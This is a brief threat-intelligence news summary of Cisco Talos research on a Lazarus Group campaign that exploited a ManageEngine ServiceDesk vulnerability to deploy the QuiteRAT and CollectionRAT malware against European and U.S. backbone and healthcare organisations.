Researchers have discovered that the Lazarus APT group has initiated a fresh initiative aimed at internet backbone infrastructure and healthcare organizations situated in Europe and the U.S.
Threat actors started their attack by taking advantage of a vulnerability within ManageEngine ServiceDesk tracked as CVE-2022-47966.
The exploit was exploited to establish initial access, prompting the download and execution of a malicious binary through the Java runtime process, thereby initiating the implant on the compromised server.
This binary represents a modified version of the group’s MagicRAT malware, dubbed QuiteRAT. They also used a malware named CollectionRAT that functions as a RAT capable of executing arbitrary commands on a compromised system.
Researchers could establish a connection between CollectionRAT and Jupiter RAT, a malicious software previously associated with the Andariel APT faction, which operates under the umbrella of the Lazarus Group.
QuiteRAT is constructed using the Qt framework, an open-source, cross-platform framework designed for crafting applications. It boasts functionalities such as arbitrary command execution.
The Lazarus Group’s incorporated only essential Qt libraries into QuiteRAT, as opposed to MagicRAT, where the entire Qt framework was integrated.
Although MagicRAT integrates mechanisms for persistence by enabling the configuration of scheduled tasks, QuiteRAT lacks inherent persistence functionality and relies on the C2 server to provide it with persistence instructions.
This marks the third officially documented campaign attributed to the Lazarus Group in the early months of 2023, and interestingly, this actor has consistently repurposed the same infrastructure across these operations.
This research was documented by researchers from Cisco Talos
Indicators of Compromise